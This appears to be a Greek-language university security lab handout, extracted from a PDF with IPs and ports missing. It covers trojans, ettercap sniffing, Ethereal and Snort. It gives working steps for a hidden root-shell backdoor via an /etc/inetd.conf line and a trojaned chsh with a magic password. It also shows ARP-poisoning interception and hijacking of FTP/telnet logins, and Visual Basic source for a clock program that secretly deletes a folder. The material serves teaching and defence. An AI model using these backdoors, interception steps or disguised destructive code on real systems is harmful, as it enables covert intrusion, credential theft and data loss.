Άσκηση 3. Θέµατα κακόβουλων προγραµµάτων

Transcript

1 Άσκηση 3 Θέµατα κακόβουλων προγραµµάτων Τα λεγόµενα backdoors είναι προβλήµατα που υπάρχουν στο σύστηµα λόγω προγραµµατιστικού λάθους ή λάθους ρύθµισης των υπηρεσιών ή τον προγραµµάτων που εκτελούνται στο σύστηµα. Επιτρέπουν την πρόσβαση σε τρίτους οι οποίοι τις περισσότερες φορές καταφέρνουν να σπάσουν την ασφάλεια του συστήµατος και να αποκτήσουν root (administrator) δικαιώµατα. Για να είναι όµως σίγουροι ότι θα µπορούν να έχουν πρόσβαση στο σύστηµα, αφού ο διαχειριστής µπορεί να ανακαλύψει το πρόβληµα και να το διορθώσει, χρησιµοποιούν τα λεγόµενα Trojan horses (δούρειοι ίπποι). Τα Trojans επιτρέπουν µια µη εξουσιοδοτηµένη κρυφή πρόσβαση (κυρίως ως root) την οποία τη γνωρίζει µόνο αυτός που το έχει εγκαταστήσει. Τα Trojans χωρίζονται σε δυο κατηγορίες Client Server Trojans Τα Trojans µπορεί να συµπεριφέρονται ως προγράµµατα του συστήµατος (web servers, ftp servers κ.λ.π.). Γενικά ανοίγουν κάποιο port στο tcp πρωτόκολλο και λειτουργούν ως servers. ίνοντας όµως την κατάλληλη εντολή (request) τρέχουνε το κέλυφος ως root και σε αφήνουν να έχεις πλήρη πρόσβαση στο σύστηµα. Άλλου είδους Trojans ακούνε σε unprivileged ports (σε ports δηλαδή που δεν χρησιµοποιούνται από προγράµµατα). Επίσης, µπορούν να ακούνε και στο icmp πρωτόκολλο κάτι το οποίο δεν γίνεται εύκολα αντιληπτό από τον διαχειριστή του συστήµατος. Όταν γίνεται σύνδεση στο Internet, τότε αυτόµατα χρησιµοποιούνται µερικές θύρες από του υπολογιστή για την επικοινωνία του. Οι θύρες αυτές δεν είναι τίποτε άλλο παρά ακέραιοι αριθµοί που χαρακτηρίζουν την κάθε εφαρµογή του υπολογιστή για την επικοινωνία του µε τους υπόλοιπους υπολογιστές. Με την εντολή netstat a από το γραµµή εντολών του DOS µπορείτε να δείτε ποιες θύρες δεν χρησιµοποιούνται και ποιες είναι σε χρήση από κάποια εφαρµογή. Όπως απεικονίζεται στο παραπάνω παράδειγµα η θύρα 1067 του υπολογιστή σας χρησιµοποιείται (established) από τον browser για την αναπαράσταση της ιστιοσελίδας του in.gr ενώ η θύρα είναι ανοιχτή (Listening) και µπορεί αν χρησιµοποιηθεί από µία εφαρµογή. Ένα πρόγραµµα Trojan µπορεί να ανοίξει µια θύρα του υπολογιστή για να επικοινωνεί µε τον υπολογιστή του χρήστη που επιτίθεται. Έτσι ο κακόβουλος χρήστης µπορεί να επικοινωνήσει µε την server εφαρµογή που έχει σταλθεί στον ανυποψίαστο χρήστη θύµα, και να καλέσει στην προκειµένη περίπτωση κλήσεις συστήµατος από τον υπολογιστή του παίρνοντας τον έλεγχο του υπολογιστή στα χέρια του. 22

2 1. Internal Trojans Ένα εσωτερικό Trojan µπορεί να είναι κάποιο εκτελέσιµο αρχείο το οποίο όταν το τρέξει οποιαδήποτε ή κάποιος συγκεκριµένος χρήστης, αυτό να του δώσει δικαιώµατα διαχειριστή συστήµατος. Επίσης µπορεί να είναι κάποιο patched (αλλαγµένο) εκτελέσιµο συστήµατος (π.χ bash, finger, passwd κ.λ.π.) που µε την κατάλληλη αίτηση (εντολή) να δίνει δικαιώµατα superuser. Παράδειγµα χρήσης ενός Trojan horse στο UNIX Ας φανταστούµε πως κάποιος τρίτος έχει κατορθώσει εκµεταλλευόµενος ένα backdoor ασφαλείας του συστήµατος να έχει πρόσβαση superuser στο σύστηµα. Για να είναι σίγουρος ότι δεν θα χάσει την πρόσβαση αυτή εγκαθιστά ένα απλό Trojan στο σύστηµα που θα του επιτρέπει πλήρη δικαιώµατα superuser οποιαδήποτε στιγµή το επιθυµήσει, παραµένοντας «αόρατος» στο σύστηµα (δηλαδή δεν καταγράφετε σε κανένα αρχείο η είσοδός του). Ο πιο απλός τρόπος να εγκαταστήσει κάποιος ένα Trojan (client-server) σε ένα unix σύστηµα είναι να προσθέσει µια εντολή στο αρχείο /etc/inetd.conf το οποίο θα εκτελεί ένα shell (κέλυφος) µόλις γίνει η σύνδεση στην tcp πόρτα που έχει οριστεί. Συνδεθείτε µέσω της υπηρεσίας ssh ως root στο σύστηµα που βρίσκετε δίπλα από το δικό σας, π.χ. ssh l root (για να συνδεθείτε π.χ στο sec2) Ανοίξτε µε κάποιον editor to αρχείο /etc/inetd.conf Το inetd.conf είναι το αρχείο ρυθµίσεων του inetd (internet super-server ). Το inetd µπορεί να διαχειριστεί πολλούς servers σαν µία εφαρµογή (να τους κλείσει, να τους ανοίξει, να τους ρυθµίσει σε ποια πόρτα να ακούνε, κλπ). Για περισσότερες πληροφορίες για το inetd εκτελέστε man inetd) και προσθέστε στο τέλος του αρχείου τη γραµµή: stream tcp nowait root /bin/bash bash i Επεξήγηση = (πορτα) stream = (τύπος του socket) tcp = το πρωτόκολλο nowait = υποδηλώνει πως ο server πρέπει να παρέχει συνέχεια συνδέσεις στην πόρτα root = το όνοµα της ιδιοκτησίας του server (στο παράδειγµα µας είναι ο root για να έχουµε πλήρη δικαιώµατα) /bin/bash bash i = Την εφαρµογή που θα εκτελέσει ο server = Παράµετροι της εφαρµογής Εκτελέστε την εντολή killall HUP inetd H εντολή killall HUP «σκοτώνει και επανεκκινεί» την εφαρµογή inetd έτσι ώστε η δεύτερη να διαβάσει το αρχείο ρυθµίσεων inetd.conf και να εκτελέσει την γραµµή που εισάγαµε. Αποσυνδεόµαστε από τον αποµακρυσµένο υπολογιστή και δοκιµάζουµε από το σταθµό εργασίας µας να δούµε εάν το Trojan που εγκαταστήσαµε λειτουργεί. Συνδεόµαστε µε την εφαρµογή telnet στην πόρτα που ορίσαµε telnet «υπολογιστής_µε_το_trojan» «πόρτα» (π.χ telnet ) Trying Connected to Escape character is '^]'. 23

3 Εάν δούµε κάτι τέτοιο στην οθόνη µας σηµαίνει πως το trojan µας δουλεύει. Πλέον µπορούµε να εκτελούµε εντολές σαν να είµαστε superuser. Κάνοντας w ή who δεν φαίνετε ότι έχουµε συνδεθεί. Είµαστε εντελώς αόρατοι στο σύστηµα. Στο τέλος κάθε εντολής πρέπει να προσθέτουµε και το ; έτσι ώστε να δηλώνουµε πως τελείωσε η σύνταξή της, π.χ ls; Εκτελώντας την εντολή netstat tlp; µπορούµε να δούµε το trojan µας να έχει ανοίξει το tcp port που του έχουµε ορίσει. Φυσικά έτσι µπορεί ο πραγµατικός administrator του συστήµατος να ανακαλύψει πιθανά εγκατεστηµένα client-server trojans Βγείτε από την υπηρεσία telnet και συνδεθείτε στον υπολογιστή που δηµιουργήσατε το trojan. ιαγράψτε τη γραµµή που είχατε προσθέσει στο /etc/inetd.conf και επανεκκινήστε τον super server inetd. Στη συνέχεια υποθέτουµε πως κάποιος τρίτος θέλει να εγκαταστήσει ένα εσωτερικο trojan σε κάποιο εκτελέσιµο αρχείο έτσι ώστε όταν το εκτελέσει από user να γίνει superuser. Φυσικά για να εγκαταστήσει ενός τέτοιου είδους trojan πρέπει κατά την εγκατάσταση να έχει δικαιώµατα superuser. Στο παράδειγµα µας έχουµε αλλάξει το εκτελέσιµο chsh µε ένα δικό µας το οποίο κάνει την ίδια ακριβώς λειτουργία µε το πραγµατικό αρχείο, αλλά όταν δοθεί συγκεκριµένος κωδικός αυτόµατα εκτελείται µε δικαιώµατα root το /bin/bash. *To chsh αλλάζει το αρχικό κέλυφος του χρήστη σύµφωνα µε την προσωπική προτίµησή του (π.χ. bash,csh,ksh). Συνδεόµαστε ως user σε έναν υπολογιστή µε την υπηρεσία ssh. ssh l sec5 $ Εκτελούµε την εφαρµογή chsh $chsh Password: Εάν δώσουµε τον πραγµατικό κωδικό του χρήστη που έχουµε συνδεθεί θα µας δοθεί η δυνατότητα να επιλέξουµε το κέλυφος που επιθυµούµε Enter the new value, or press return for the default $ Login Shell [/bin/bash]: Εάν όµως εκτελέσουµε το chsh και για κωδικό βάλουµε τον κωδικό satori, αυτόµατα θα εκτελεστεί το /bin/bash µε δικαιώµατα root! $chsh Password: satori # whoami root 24

4 Sniffers ettercap Κάντε login στον υπολογιστή σας ως κανονικός χρήστης και συνδεθείτε αποµακρυσµένα στην ip (µε την υπηρεσία ssh ) ως superuser (root). ssh l root Εκτελέστε το πρόγραµµα ettercap Το ettercap είναι ένας «sniffer» για Ethernet δίκτυα. Μπορεί να καταγράψει κωδικούς από αποµακρυσµένες συνδέσεις σε υπηρεσίες telnet,ftp κ.λ.π., κυρίως plain text. Επίσης, µπορεί να παρακολουθήσει µια σύνδεση ανάµεσα σε δυο υπολογιστές και να καταγράψει τα δεδοµένα που ανταλλάσσονται τόσο σε επίπεδο hubed network, όσο και σε επίπεδο switched network. Στο switched network to ettercap επιτυγχάνει την παρακολούθηση (sniffing) µέσω της τεχνικής Man in the middle attack. Το Ettercap στην αρχή θα ψάξει το δίκτυο για τους υπάρχοντες ενεργούς υπολογιστές και θα τους εµφανίσει σε µία λίστα ως source targets (αριστερή στήλη) και destination targets (δεξιά στήλη). Από αυτές τις στήλες θα µπορούµε να κάνουµε τις επιλογές µας για το ποιο host θα ερευνήσουµε. Your IP: with MAC: 00:50:BF:05:F0:32 on Iface: eth0 Loading plugins... Done. Building host list for netmask , please wait... Sending 255 ARP request... - =========================> % Η αρχική οθόνη του ettercap 25

5 Στην αρχική οθόνη µπορούνε να συλλέξουµε πληροφορίες όπως την ip µας, την MAC address της κάρτας δικτύου που έχουµε. Το interface που χρησιµοποιούµε (eth0) καθώς και αν το δίκτυο βασίζεται σε hub ή σε switch. Από τη δεξιά η από την αριστερή στήλη µπορείτε να επιλέξετε µε τα βελάκια την ip του υπολογιστή που επιθυµείτε και να ανιχνεύσετε µε το πλήκτρο (f) τι τύπος είναι (το λειτουργικό του, τι κάρτα Ethernet έχει κ.λ.π.). Η τεχνική αυτή ονοµάζεται «O.S. fingerprint» Στο παράδειγµα µας έχουµε επιλέξει τον υπολογιστή και το πρόγραµµα έχει συλλέξει τις απαραίτητες πληροφορίες. Ας υποθέσουµε πως το δίκτυο µας είναι συνδεδεµένο µε switch και στον υπολογιστή µε την ip υπάρχει ένας ftp server. Σε αυτόν τον server συνδέονται καθηµερινά άτοµα από διάφορους υπολογιστές του τοπικού δικτύου για να µεταφέρουν προσωπικά έγγραφα. Ένας τρίτος ο οποίος γνωρίζει τις τεχνικές sniffing µπορεί να υποκλέψει κωδικούς και να παρακολουθήσει ολόκληρη τη συνοµιλία µεταξύ του server και των clients. Η άσκηση αυτή πραγµατοποιείται από δύο οµάδες. Η πρώτη οµάδα θα συνδεθεί στον server µέσω της υπηρεσίας ftp ενώ η δεύτερη θα χειρίζεται το ettercap και θα παρακολουθεί την επικοινωνία. 1) Επιλέξτε από το ettercap τον Υπολογιστή-Προορισµό (δηλαδή τον server). Αυτό πραγµατοποιείται πατώντας enter στον υπολογιστή της δεξιάς στήλης (destination targets) 26

6 Ας υποθέσουµε πως θέλουµε να παρακολουθήσουµε ως στόχο-προορισµού (destination target) τον υπολογιστή και ως στόχο-πηγής (source target) οποιονδήποτε υπολογιστή. Στην παρακάτω οθόνη διακρίνουµε το υλοποιηµένο το παράδειγµά µας. Έχει επιλεγεί ως 00:04:76:DC:B3:A6 προορισµός ο υπολογιστής µε την ip και την MAC address 2) Έπειτα πατάµε το πλήκτρο (α) (ARP poisoning based sniffing) το οποίο ενεργοποιεί τη λειτουργία sniffing σε δίκτυα µε switches. Θα εµφανιστεί η ακόλουθη οθόνη η οποία επιβεβαιώνει τις ρυθµίσεις που έχουµε κάνει µέχρι τώρα για την λειτουργία switched sniffing. 3) Το sniffer µας είναι σε λειτουργία πραγµατικού χρόνου. Η οµάδα που βρίσκεται σε κάποιον άλλο υπολογιστή πρέπει να δοκιµάσει να συνδεθεί µε την υπηρεσία ftp στον υπολογιστή Πρέπει να εκτελέσει την εντολή ftp και να πληκτρολογήσει ως username: secsnif και ως password hiddenpass Με το που θα γίνει η διαδικασία εισόδου to ettercap θα έχει υποκλέψει τα προσωπικά στοιχεία του λογαριασµού που εισήχθησαν και θα έχει εµφανίσει τη σύνδεση που ανίχνευσε. 27

7 Με την εντολή (q) διακόπτετε την λειτουργία sniffing του ettercap και επιστρέφετε στην αρχική οθόνη του προγράµµατος. Sniffing και Επίθεση Man in the middle Επαναλάβετε το ίδιο παράδειγµα µόνο που αντί για να συνδεθείτε στην υπηρεσία ftp συνδεθείτε στην υπηρεσία telnet. Έχοντας ανοιχτή την επιβεβαίωση της telnet σύνδεσης στην εφαρµογή ettercap, πατήστε enter πριν η άλλη οµάδα πληκτρολογήσει τα στοιχεία για την είσοδο στο λογαριασµό. Η επιβεβαίωση πρέπει να είναι κάπως έτσι :1081 <--> :23 active telnet Πατώντας enter το πρόγραµµα εισέρχεται σε λειτουργία Sniffing - Man in the middle attack και υποκλέπτει όλη την επικοινωνία µεταξύ των δύο υπολογιστών. Ο τρίτος χρήστης που παρακολουθεί την επικοινωνία µπορεί να την τερµατίσει πατώντας (k) ή να εισάγει δικά του δεδοµένα (injection hijacking) στην επικοινωνία µε την εντολή (i). ETHEREAL Θα χρησιµοποιήσουµε ένα πρόγραµµα server/client για ανταλλαγή µηνυµάτων µε χρήση sockets και του udp πρωτοκόλλου, ενώ ταυτόχρονα θα γίνεται η καταγραφή των πακέτων που αποστέλλονται και η ανάλυση τους, µε χρήση του προγράµµατος ethereal. Εκκίνηση ethereal Από γραφικό περιβάλλον ανοίγουµε ένα παράθυρο τερµατικού και πληκτρολογούµε: #ethereal Εµφανίζεται το κεντρικό παράθυρο του Ethereal: 28

8 Επιλεγούµε Capture και µετά Interfaces Επιλεγούµε το interface lo και πατάµε Capture 29

9 Εκκίνηση του Server ανταλλαγής µηνυµάτων Ενώ το Ethereal βρίσκεται σε Capture mode ανοίγουµε ένα παράθυρο τερµατικού και πληκτρολογούµε: #cd /home/socket_udp/server #./server Με τις εντολές αυτές εκτελείται ο server του προγράµµατος ανταλλαγής µηνυµάτων. Εκκίνηση του Client ανταλλαγής µηνυµάτων Στην συνεχεία ανοίγουµε ένα ακόµα παράθυρο τερµατικού και πληκτρολογούµε: #cd /home/socket_udp/client #./client Με τις εντολές αυτές εκτελείται ο client. Καταγραφή πακέτων µέσω του Ethereal Στο παράθυρο στο οποίο εκτελείται ο client πληκτρολογούµε ένα µήνυµα, πχ: Testing Ethereal packet capture 30

10 Εάν παρατηρήσουµε το παράθυρο του Ethereal βλέπουµε ότι έχει γίνει συλλογή πακέτων τα οποία µεταδοθήκαν από τον client στον server και επέστρεψαν στον client. Αφού έγινε η καταγραφή των πακέτων πατάµε στο Stop. Στην συνεχεία βλέπουµε στο Ethereal την ανάλυση των πακέτων που συλλέχθηκαν. Εάν πατήσουµε επάνω σε κάποιο από τα πακέτα στο επάνω παράθυρο τότε µας εµφανίζεται η ανάλυση του πακέτου στο κεντρικό και στο κάτω παράθυρο. 31

11 Στην ανάλυση του πακέτου βλέπουµε το µήνυµα που είχαµε πληκτρολογήσει στον client. Στην επιλογή Capture -> Options µπορούµε να επιλέξουµε επιπλέον ρυθµίσεις για την διαδικασία συλλογής των πακέτων. Στην λίστα Interface µπορούµε να επιλέξουµε την διεπαφή στην οποία το Εthereal θα κάνει συλλογή πακέτων. 32

12 Μια από τις πιο σηµαντικές επιλογές είναι η: Update list of packets in real time Επιλέγοντας την επιλογή αυτή έχουµε προβολή των πακέτων σε πραγµατικό χρόνο κατά την συλλογή. SNORT ΠΕΙΡΑΜΑ 1 Sniffer Mode: Χρησιµοποιώντας το πρόγραµµα SNORT, να γίνει παρακολούθηση των πακέτων που καταφθάνουν στον προσαρµογέα δικτύου του υπολογιστή που εκτελείται το SNORT. Στον υπολογιστή που είναι εγκατεστηµένο το SNORT εκτελούµε την εντολή: #snort v Το SNORT βρίσκεται σε κατάσταση sniffer. Από έναν άλλο υπολογιστή στο τοπικό µας δίκτυο κάνουµε ping στον υπολογιστή στον οποίο εκτελείται το SNORT. Στην οθόνη παρακολουθούµε τα πακέτα τα οποία ανιχνεύει το SNORT. Για να διακόψουµε την εκτέλεση του SNORT, πατάµε τα πλήκτρα CTRL-C Ακολουθεί η έξοδος του snort µετά την εκτέλεσή του σε sniffer mode: 33

13 Στην εικόνα της εξόδου παρατηρούµε ότι το snort εντόπισε 8 πακέτα από τα οποία τα 3 αναλύθηκαν και εντοπίστηκε ότι ανήκουν στο πρωτόκολλο TCP. ΠΕΙΡΑΜΑ 2 Packet Log Mode: Χρησιµοποιώντας το πρόγραµµα SNORT σε κατάσταση sniffer, να γίνει καταγραφή των πακέτων που ανιχνεύονται σε ένα log αρχείο (Packet Log). Στον υπολογιστή που είναι εγκατεστηµένο το SNORT εκτελούµε την εντολή: #snort dev l /tmp Το SNORT βρίσκεται σε κατάσταση sniffer. Από έναν άλλο υπολογιστή στο τοπικό µας δίκτυο κάνουµε ping στον υπολογιστή στον οποίο εκτελείται το SNORT. Στην οθόνη παρακολουθούµε τα πακέτα τα οποία ανιχνεύει το SNORT. Για να διακόψουµε την εκτέλεση του SNORT, πατάµε τα πλήκτρα CTRL-C Με την εντολή #cd /tmp µεταβαίνουµε στον φάκελο tmp όπου είναι αποθηκευµένο το log αρχείο που δηµιούργησε το SNORT. Για να δούµε τα περιεχόµενα του αρχείου δίνουµε την εντολή: #snort dev r /tmp/(όνοµα του log αρχείου) Ακολουθεί η έξοδος του snort σε κατάσταση Packet Log Mode: 34

14 Στην παραπάνω εικόνα παρατηρούµε την αναφορά του snort για τα πακέτα που αναλύθηκαν και την επιβεβαίωση ότι έγινε καταγραφή τους σε log αρχείο (LOGGED: 9) ΠΕΙΡΑΜΑ 3 Network Intrusion Mode: Χρησιµοποιώντας το πρόγραµµα SNORT σε κατάσταση Network Intrusion, να γίνει παρακολούθηση των πακέτων τα οποία αφορούν την υπηρεσία telnet. Για να γίνει αυτό πρέπει να επιλέξουµε το σύνολο κανόνων (rules) που είναι υπεύθυνα για την παρακολούθηση της υπηρεσίας αυτής. Το αρχείο που περιέχει τους κανόνες για την παρακολούθηση της υπηρεσίας telnet είναι το telnet.rules και βρίσκεται στον φάκελο /etc Εκτελούµε την εντολή: #snort A console -d -h /24 -l /tmp -c /etc/ telnet.rules Το SNORT βρίσκεται σε κατάσταση Intrusion Mode. Από έναν άλλο υπολογιστή πληκτρολογούµε: #telnet (IP του υπολογιστή στον οποίο τρέχει το snort) Στην οθόνη παρακολουθούµε την ειδοποίηση του SNORT όταν ανιχνεύει προσπάθεια σύνδεσης µε telnet. Εκτός της ειδοποίησης γίνεται και καταγραφή των πακέτων που αφορούν το telnet. Για να διακόψουµε την εκτέλεση του SNORT, πατάµε τα πλήκτρα CTRL-C 35

15 Στην οθόνη βλέπουµε ότι το SNORT βρίσκεται σε κατάσταση Network Intrusion Mode. Στην οθόνη βλέπουµε την ειδοποίηση του SNORT για προσπάθεια σύνδεσης στον υπολογιστή µε χρήση telnet. Στην οθόνη βλέπουµε την αναφορά του SNORT για την ύπαρξη πακέτων τα οποία έχουν καταγραφεί στο log αρχείο. 36

16 Ακολουθούν τα περιεχόµενα του αρχείου telnet.rules το οποίο περιέχει τα φίλτρα για την παρακολούθηση της δραστηριότητας µέσω telnet: alert tcp any 23 <> any any (msg:"telnet access detected";) Όπου: alert: Θα καταχωρηθεί στο log αρχείο κάθε προσπάθεια σύνδεσης µε χρήση της υπηρεσίας telnet από και προς τον υπολογιστή που εκτελείται το snort. tcp:το πρωτόκολλο στο οποίο θα γίνει η ανάλυση any 23:Η διεύθυνση και η θύρα προέλευσης των πινάκων telnet <>: Η ροή των πακέτων. Από και προς τον υπολογιστή που τρέχει το snort. any any: Η διεύθυνση και η θύρα προορισµού των πακέτων telnet. msg: ;:Το µήνυµα που θέλουµε να µας εµφανίζεται στην οθόνη για κάθε προσπάθεια σύνδεσης µε χρήση telnet. Κατασκευή ιού σε Visual Basic Στην προκειµένη περίπτωση θα εξετάσουµε έναν ιό που σβήνει έναν φάκελο του συστήµατος. Υλοποίηση του πηγαίου κώδικα Για την κατασκευή αυτού του είδους ιού, θα πρέπει να γνωρίζουµε πως µπορούµε να διαχειριστούµε αρχεία µε την χρήση της Visual Basic 6.0. Έτσι η VB µας δίνει την δυνατότητα ελέγχου αρχείων µέσω της βιβλιοθήκης Microsoft Scripting Runtime. Για να µπορέσουµε να ενσωµατώσουµε αυτή την βιβλιοθήκη εκτελούµε τα εξής βήµατα: 1. Από το menu επιλέγουµε Project->Preferences 2. Επιλέγουµε Microsoft Scripting Runtime 3. Πατάµε OK Ιός Ρολόι Παρακάτω θα εξετάσουµε τον πηγαίο κώδικα του ιού που στον ανυποψίαστο χρήστη είναι απλά ένα ρολόι. Στην πραγµατικότητα όµως, όταν περάσουν 5sec αυτόµατα διαγράφεται ο φάκελος wintest από τον σκληρό σας. 1. Ανοίξτε την VB6 και πατήστε New Standar Exe 2. Επιλέξτε το Microsoft Scripting Runtime 3. Προσθέστε ένα label στην φόρµα σας 4. Αλλάξτε από τα properties του Label την επιλογή font και διαλέξτε Comics_San, Bold Italic, Προσθέστε ένα timer στην φόρµα σας και αλλάξτε από τα properties την τιµή interval σε Προσθέστε των παρακάτω κώδικα Private Sub Form_Load() ίνει τον έλεγχο αρχείου σε µία µεταβλητή Dim a As New FileSystemObject Dim ds Η µεταβλητή ds πέρνει το χειρισµό του φακέλου wintest Set ds = a.getfolder("c:\wintest ") ιαγράφεται ο φάκελος ds.delete End Sub 37

17 Private Sub Timer1_Timer() Το Label δείχνει την ώρα Label1.Caption = Time End Sub 38